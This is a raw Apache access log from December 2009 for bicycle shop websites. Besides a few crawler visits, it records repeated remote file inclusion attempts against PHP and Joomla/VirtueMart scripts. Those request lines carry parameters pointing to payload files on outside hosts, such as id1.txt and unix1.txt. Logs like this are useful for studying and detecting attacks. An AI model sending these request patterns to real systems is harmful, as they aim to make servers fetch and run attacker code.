64.34.162.83 - - [10/Dec/2009:00:02:25 -0800] "GET /logs/send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.167.62.171 - - [10/Dec/2009:00:05:43 -0800] "GET /translations/Turkish.txt HTTP/1.1" 200 32818 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.svbikes.com"
83.167.62.171 - - [10/Dec/2009:00:05:47 -0800] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.svbikes.com"
83.167.62.171 - - [10/Dec/2009:00:05:51 -0800] "GET /blog/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "svbikes.com"
211.234.106.119 - - [10/Dec/2009:00:07:48 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://shetha.t35.com/admin/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [10/Dec/2009:00:07:48 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://shetha.t35.com/admin/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [10/Dec/2009:00:07:48 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://shetha.t35.com/admin/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [10/Dec/2009:00:07:50 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://shetha.t35.com/admin/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [10/Dec/2009:00:07:51 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://shetha.t35.com/admin/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.234.106.119 - - [10/Dec/2009:00:07:51 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://shetha.t35.com/admin/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.162.83 - - [10/Dec/2009:00:09:20 -0800] "GET /send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.162.83 - - [10/Dec/2009:00:09:20 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.162.83 - - [10/Dec/2009:00:09:38 -0800] "GET /logs/send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:09:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:06 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:06 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:13 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:18 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.162.83 - - [10/Dec/2009:00:10:20 -0800] "GET /send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.162.83 - - [10/Dec/2009:00:10:20 -0800] "GET /logs/send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:39 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:10:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.34.162.83 - - [10/Dec/2009:00:10:42 -0800] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://bag.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:11:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:11:14 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:11:17 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:11:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:11:45 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:08 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:09 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:15 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:21 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.192.20.164 - - [10/Dec/2009:00:12:27 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/icon/private_icon/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.29.247 - - [10/Dec/2009:00:13:41 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:20:38 -0800] "GET /logs/access.log%20%20/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:20:38 -0800] "GET /errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:20:38 -0800] "GET /logs/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:20:46 -0800] "GET /logs/access.log%20%20/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:20:46 -0800] "GET /errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:20:46 -0800] "GET /logs/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:21:04 -0800] "GET /logs/access.log/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:21:04 -0800] "GET /errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:21:07 -0800] "GET /logs/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:21:53 -0800] "GET /logs/access.log/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:21:53 -0800] "GET /logs/errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.86.17.106 - - [10/Dec/2009:00:21:53 -0800] "GET /errors.php?error=http://bobbydonut.com/stephanie/id11.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:00:41:37 -0800] "GET /include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:00:41:37 -0800] "GET /logs//include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:00:41:37 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:00:41:54 -0800] "GET /include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:00:41:54 -0800] "GET /logs//include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:00:41:54 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:00:50:31 -0800] "GET /logs/access.log%20%20/?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:00:50:31 -0800] "GET /?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:00:50:31 -0800] "GET /logs/?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:00:50:32 -0800] "GET /logs/access.log%20%20/?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:00:50:32 -0800] "GET /logs/?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:00:50:32 -0800] "GET /?_zb_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.183 - - [10/Dec/2009:00:57:32 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [10/Dec/2009:00:57:34 -0800] "GET /bullitinboard/viewtopic.php?p=15843 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
210.114.220.160 - - [10/Dec/2009:01:00:15 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:00:15 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:00:15 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:01:06:07 -0800] "GET /logs/access.log//include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [10/Dec/2009:01:15:22 -0800] "GET /logs/access.log//include/write.php?dir=http://www.nispo.net/blog/wp-includes//images/swear.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:28:54 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:28:54 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.218.169 - - [10/Dec/2009:01:28:54 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:28:55 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:28:55 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.86.34.18 - - [10/Dec/2009:01:28:56 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:32 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:32 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:32 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:32 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:33 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:33 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:33 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:33 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:31:33 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:31:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:31:34 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:31:34 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:31:35 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:31:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:31:35 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [10/Dec/2009:01:31:54 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [10/Dec/2009:01:31:54 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.9.108.190 - - [10/Dec/2009:01:31:54 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:32:37 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:32:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:32:37 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:32:38 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:32:38 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.19 - - [10/Dec/2009:01:32:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:33:20 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:33:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:33:20 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:33:20 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:33:20 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.39.162 - - [10/Dec/2009:01:33:20 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.kq-china.com//web/components/com_virtuemart/themes/default/mawar.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.193.26 - - [10/Dec/2009:01:37:34 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; ImageShack Toolbar 3.0.6)" "bicyclestoreshouston.com"
174.120.218.169 - - [10/Dec/2009:01:38:32 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://host0186.host.org/~paypalfo/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.114.220.160 - - [10/Dec/2009:01:39:46 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
